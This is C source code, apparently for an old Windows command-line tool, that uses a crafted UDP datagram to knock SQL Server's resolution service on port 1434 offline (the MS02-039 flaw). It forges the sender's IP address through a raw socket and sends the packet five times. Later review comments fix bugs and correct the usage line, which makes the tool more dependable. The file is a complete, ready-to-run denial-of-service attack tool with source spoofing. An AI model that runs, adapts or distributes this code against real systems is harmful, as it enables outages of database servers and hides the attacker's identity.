利用 SQL Server UDP 溢出 (MS02-039) 的 DoS 程序源代码 — source of a denial-of-service tool that sends a crafted UDP datagram to the SQL Server resolution port (1434) from a spoofed address


////////////////////////////////////////////////////////////
//             
// SQL Overflow dos tool
//
// Reference: MS02-039
//
// Author: refdom
// Email: refdom@263.net
// Homepage: www.opengram.com
//
////////////////////////////////////////////////////////////

#include <string.h>
#include <stdio.h>
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>

#pragma comment(lib,"ws2_32.lib")

/* UDP ports used by Sendudp(). DEST_PORT is the SQL Server resolution
 * service port that the MS02-039 reference in the file header concerns.
 * SOURCE_PORT 53 is presumably chosen so the spoofed datagram resembles a
 * DNS reply to permissive filters -- the file does not say.
 * Named enum constants rather than macros; htons() accepts them as before. */
enum {
    SOURCE_PORT = 53,
    DEST_PORT = 1434
};

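/* IPv4 header as sent on the wire (RFC 791): 20 bytes, no options.
 * Sendudp() fills this in by hand and hands it to a raw socket with
 * IP_HDRINCL, so the layout must match the wire format exactly: every
 * field is naturally aligned and the total size is pinned by the
 * compile-time check below. Multi-byte fields are stored in network byte
 * order by the caller. */
typedef struct ip_hdr
{
    unsigned char h_verlen;        /* version in the high nibble, header length in 32-bit words in the low nibble */
    unsigned char tos;             /* 8-bit type of service */
    unsigned short total_len;      /* 16-bit total length in bytes (header + payload) */
    unsigned short ident;          /* 16-bit identification */
    unsigned short frag_and_flags; /* 3-bit flags + 13-bit fragment offset (not just the flags) */
    unsigned char ttl;             /* 8-bit time to live */
    unsigned char proto;           /* 8-bit protocol (IPPROTO_UDP here) */
    unsigned short checksum;       /* 16-bit header checksum; Sendudp() leaves it 0 */
    unsigned int sourceIP;         /* 32-bit source address (Sendudp() writes the spoofed one here) */
    unsigned int destIP;           /* 32-bit destination address */
} IP_HEADER;

/* Fails to compile (negative array size) if padding or a wider type ever
 * moves the header away from the 20 bytes IPv4 requires. */
typedef char ip_header_size_check[sizeof(IP_HEADER) == 20 ? 1 : -1];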

/* Pseudo-header prepended to a TCP/UDP segment when computing its checksum
 * (RFC 793 / RFC 768): source, destination, zero byte, protocol, length.
 * NOTE(review): nothing in this file references psd_header -- Sendudp()
 * assembles the UDP pseudo-header byte by byte into its own buffer
 * instead. Also note that `unsigned long` is 32 bits on Win32 but 64 bits
 * on LP64 targets, so this struct is only the expected 12 bytes on the
 * Windows build the winsock includes imply. */
struct //TCP/UDP pseudo-header for checksum computation
{
unsigned long saddr; //source address
unsigned long daddr; //destination address
char mbz; //must be zero
char ptcl; //protocol number
unsigned short tcpl; //TCP length (header + payload)
}psd_header;

/* TCP header (RFC 793), 20 bytes without options, using the Win32 USHORT
 * alias for its 16-bit fields.
 * NOTE(review): not referenced anywhere in this file -- the tool only sends
 * UDP. Presumably left over from a TCP variant of this sender. */
typedef struct tcp_hdr //TCP header
{
USHORT th_sport; //16-bit source port
USHORT th_dport; //16-bit destination port
unsigned int th_seq; //32-bit sequence number
unsigned int th_ack; //32-bit acknowledgement number
unsigned char th_lenres; //4-bit header length / 4 of the 6 reserved bits
unsigned char th_flag; //remaining reserved bits + 6 flag bits
USHORT th_win; //16-bit window size
USHORT th_sum; //16-bit checksum
USHORT th_urp; //16-bit urgent pointer
}TCP_HEADER;

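/* UDP header (RFC 768): 8 bytes, all fields in network byte order.
 * Sendudp() fills it by hand; udp_length counts header plus payload, and a
 * udp_checksum of 0 on the wire means "no checksum". */
typedef struct udp_hdr
{
    unsigned short sourceport;   /* 16-bit source port */
    unsigned short destport;     /* 16-bit destination port */
    unsigned short udp_length;   /* 16-bit length of header + payload */
    unsigned short udp_checksum; /* 16-bit checksum over pseudo-header, header and payload; 0 = none */
} UDP_HEADER;

/* Compile-time guard: the wire format is exactly 8 bytes. */
typedef char udp_header_size_check[sizeof(UDP_HEADER) == 8 ? 1 : -1];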

//CheckSum:计算校验和的子函数
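/* Internet checksum (RFC 1071): one's-complement sum of 16-bit words.
 *
 * buffer: data to sum, read as 16-bit words in whatever byte order they
 *         sit in memory. Because the sum is byte-order independent, a
 *         buffer already laid out in network order yields a result that
 *         can be stored straight into a header field (Sendudp() does so).
 * size:   number of bytes. An odd trailing byte contributes as the low
 *         octet of a final zero-padded word (little-endian reading; on the
 *         x86 Windows build this matches the wire order).
 * Returns the one's complement of the folded sum.
 *
 * Changes from the original: a size <= 0 sums nothing and returns 0xFFFF
 * (the original read one stray byte for a negative size); the Win32
 * USHORT/UCHAR aliases are replaced by the identical standard types so the
 * routine is portable; the pointer parameter is const. */
unsigned short checksum(const unsigned short *buffer, int size)
{
    unsigned long sum = 0;

    /* Whole 16-bit words. */
    while (size > 1) {
        sum += *buffer++;
        size -= (int)sizeof(unsigned short);
    }
    /* Odd trailing byte, zero-padded to a word. */
    if (size == 1) {
        sum += *(const unsigned char *)buffer;
    }
    /* Fold carries back in twice: after the first fold the value is at most
     * 0x1FFFE, so one more fold clears any remaining carry. */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)(~sum);
}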

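/* Print the banner and command-line synopsis to stdout.
 *
 * The argument order now matches what main() actually reads: argv[1] is the
 * target, argv[2] is the spoofed source address. The original banner had
 * them the other way round ("Fake_ip Target_ip"), so anyone following it
 * sent the datagrams to the address they meant to spoof; it also
 * misspelled "Usage". Every other line is printed byte for byte as before. */
void Usage(void)
{
    static const char *const lines[] = {
        "******************************************\n",
        "SQLOverFlowDOS(MS02-039)\n",
        "\t Written by Refdom\n",
        "\t Email: refdom@263.net\n",
        "\t Homepage: www.opengram.com\n",
        "Usage: SQLDOS.exe Target_ip Fake_ip \n",
        "*******************************************\n",
    };
    size_t i;

    for (i = 0; i < sizeof(lines) / sizeof(lines[0]); i++) {
        fputs(lines[i], stdout);
    }
}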

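/* Compute the UDP checksum for one datagram (RFC 768).
 *
 * The checksum covers a 12-byte pseudo-header taken from the IP header
 * (source, destination, zero byte, protocol, UDP length), then the UDP
 * header with its checksum field zeroed, then the payload. The original
 * code assembled this inline in Sendudp()'s send buffer; it is split out so
 * the send path reads top to bottom.
 *
 * ip, udp:      headers already in network byte order.
 * payload, len: datagram payload; len must be >= 0 and fit the local buffer.
 * Returns the value to store in udp_checksum. checksum() sums the bytes as
 * they sit in memory (already wire order), so no htons() is applied -- the
 * original stored the result the same way. A computed zero is returned as
 * 0xFFFF because RFC 768 reserves 0 for "no checksum". Out-of-range lengths
 * also yield 0xFFFF, which cannot occur for the fixed 80-byte payload. */
static unsigned short compute_udp_checksum(const IP_HEADER *ip, const UDP_HEADER *udp,
                                           const char *payload, int len)
{
    /* Declared as 16-bit words so the cast inside checksum() is aligned. */
    unsigned short words[128];
    unsigned char *p = (unsigned char *)words;
    UDP_HEADER udp_zeroed = *udp;
    int total = 12 + (int)sizeof(UDP_HEADER) + len;
    unsigned short sum;

    if (len < 0 || total > (int)sizeof(words)) {
        return 0xFFFF;
    }
    udp_zeroed.udp_checksum = 0;
    memset(words, 0, sizeof(words));

    /* Pseudo-header. */
    memcpy(p, &ip->sourceIP, sizeof(ip->sourceIP));
    p += sizeof(ip->sourceIP);
    memcpy(p, &ip->destIP, sizeof(ip->destIP));
    p += sizeof(ip->destIP);
    *p++ = 0;                 /* must-be-zero byte */
    *p++ = ip->proto;
    memcpy(p, &udp->udp_length, sizeof(udp->udp_length));
    p += sizeof(udp->udp_length);
    /* UDP header (checksum field 0) and payload. */
    memcpy(p, &udp_zeroed, sizeof(udp_zeroed));
    p += sizeof(udp_zeroed);
    memcpy(p, payload, (size_t)len);

    sum = checksum((USHORT *)words, total);
    return sum == 0 ? 0xFFFF : sum;
}

/* Send the MS02-039 probe datagram to ulTargetIP five times, 500 ms apart,
 * with ulFakeIP as the IP source address.
 *
 * Both addresses are 32-bit network-order values as returned by inet_addr().
 * The IP and UDP headers are built by hand and written through a raw socket
 * with IP_HDRINCL, which is what allows the forged source. The IP header
 * checksum is left at 0 -- presumably relying on the Windows stack to fill
 * it in; confirm on the target OS. NOTE(review): later Windows releases are
 * reported to refuse raw UDP sends whose source address is not assigned to
 * the host, in which case the spoofing silently does not happen.
 *
 * Payload: a 0x04 byte followed by 77 'A' bytes and two zero bytes -- the
 * request shape the MS02-039 reference in the file header concerns; the
 * meaning of the leading byte is not documented in this file.
 *
 * Fixes relative to the original: the socket is closed on every exit path
 * (it leaked on setsockopt/sendto failure); a computed UDP checksum of zero
 * is sent as 0xFFFF as RFC 768 requires; the header-length nibble is derived
 * from 4-byte words rather than sizeof(unsigned long), which is 8 on LP64;
 * the payload is copied with memcpy rather than a byte loop. Output and
 * packet contents are otherwise unchanged. No return value: failures are
 * reported on stdout only. */
void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP)
{
    SOCKET sock = INVALID_SOCKET;
    SOCKADDR_IN addr_in;
    BOOL flag = true;
    char payload[80];
    IP_HEADER ipHeader;
    UDP_HEADER udpHeader;
    char sendbuf[256];
    int datagram_len;
    int j;

    /* 0x04 request byte, then 'A' filler; the last two bytes stay zero. */
    memset(payload, 0, sizeof(payload));
    memset(payload, 'A', sizeof(payload) - 2);
    payload[0] = 0x04;

    sock = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, 0);
    if (sock == INVALID_SOCKET) {
        printf("socket Error!\n");
        return;
    }

    /* IP_HDRINCL: we supply the IP header ourselves (needed to forge the source). */
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
        printf("setsockopt Error!\n");
        goto out;
    }

    datagram_len = (int)(sizeof(ipHeader) + sizeof(udpHeader) + sizeof(payload));

    /* IPv4, 5-word (20-byte) header, no fragmentation, TTL 128. */
    memset(&ipHeader, 0, sizeof(ipHeader));
    ipHeader.h_verlen = (unsigned char)((4 << 4) | (sizeof(ipHeader) / 4));
    ipHeader.tos = 0;
    ipHeader.total_len = htons((unsigned short)datagram_len);
    ipHeader.ident = 0;
    ipHeader.frag_and_flags = 0;
    ipHeader.ttl = 128;
    ipHeader.proto = IPPROTO_UDP;
    ipHeader.checksum = 0;      /* not computed here -- see the header comment */
    ipHeader.sourceIP = ulFakeIP;
    ipHeader.destIP = ulTargetIP;

    udpHeader.sourceport = htons(SOURCE_PORT);
    udpHeader.destport = htons(DEST_PORT);
    udpHeader.udp_length = htons((unsigned short)(sizeof(udpHeader) + sizeof(payload)));
    udpHeader.udp_checksum = 0;
    udpHeader.udp_checksum = compute_udp_checksum(&ipHeader, &udpHeader, payload, (int)sizeof(payload));

    /* Wire image: IP header, UDP header, payload. */
    ZeroMemory(sendbuf, sizeof(sendbuf));
    memcpy(sendbuf, &ipHeader, sizeof(ipHeader));
    memcpy(sendbuf + sizeof(ipHeader), &udpHeader, sizeof(udpHeader));
    memcpy(sendbuf + sizeof(ipHeader) + sizeof(udpHeader), payload, sizeof(payload));

    /* Destination for sendto(); the IP header above carries the same address.
     * sin_port is set as the original did, presumably not consulted for a raw socket. */
    memset(&addr_in, 0, sizeof(addr_in));
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(DEST_PORT);
    addr_in.sin_addr.S_un.S_addr = ulTargetIP;

    printf("\n Starting send packet\n\t");

    for (j = 0; j < 5; j++) {
        Sleep(500);
        if (sendto(sock, sendbuf, datagram_len, 0, (SOCKADDR *)&addr_in, sizeof(addr_in)) == SOCKET_ERROR) {
            printf("Send Error!\n");
            goto out;
        }
        printf(".");
    }

    printf("\n Send OK!\n");

out:
    /* Reached on success and on every failure after the socket was created. */
    closesocket(sock);
}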

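/* Entry point: SQLDOS.exe Target_ip Fake_ip
 *
 * argv[1] is the destination address, argv[2] the forged source address,
 * both dotted quads parsed by inet_addr(). Exit status is 0 on completion
 * and 1 on a usage error, a Winsock initialisation failure, or an address
 * that does not parse.
 *
 * Changes from the original: error paths returned `false` (0), so a script
 * could not tell failure from success; WSAStartup() now comes before
 * inet_addr(), as Winsock documents WSAStartup() as the first call an
 * application must make; and an inet_addr() result of INADDR_NONE
 * (0xFFFFFFFF) is rejected instead of being used as an address. Sendudp()
 * reports its own failures on stdout. */
int main(int argc, char* argv[])
{
    WSADATA WSAData;
    unsigned long ulTargetIP, ulFakeIP;
    int rc = 1;

    Usage();

    if (argc < 3) {
        return 1;
    }

    if (WSAStartup(MAKEWORD(2, 0), &WSAData) != 0) {
        printf("WSAStartup error.Error:%d\n", WSAGetLastError());
        return 1;
    }

    ulTargetIP = inet_addr(argv[1]);
    ulFakeIP = inet_addr(argv[2]);
    /* inet_addr() yields 0xFFFFFFFF (INADDR_NONE) for unparsable input. */
    if (ulTargetIP == 0xFFFFFFFFUL || ulFakeIP == 0xFFFFFFFFUL) {
        printf("Invalid IP address.\n");
        goto out;
    }

    printf("DOS starting ...\n");

    Sendudp(ulTargetIP, ulFakeIP);

    printf("\nComplete!\n");
    rc = 0;

out:
    WSACleanup();
    return rc;
}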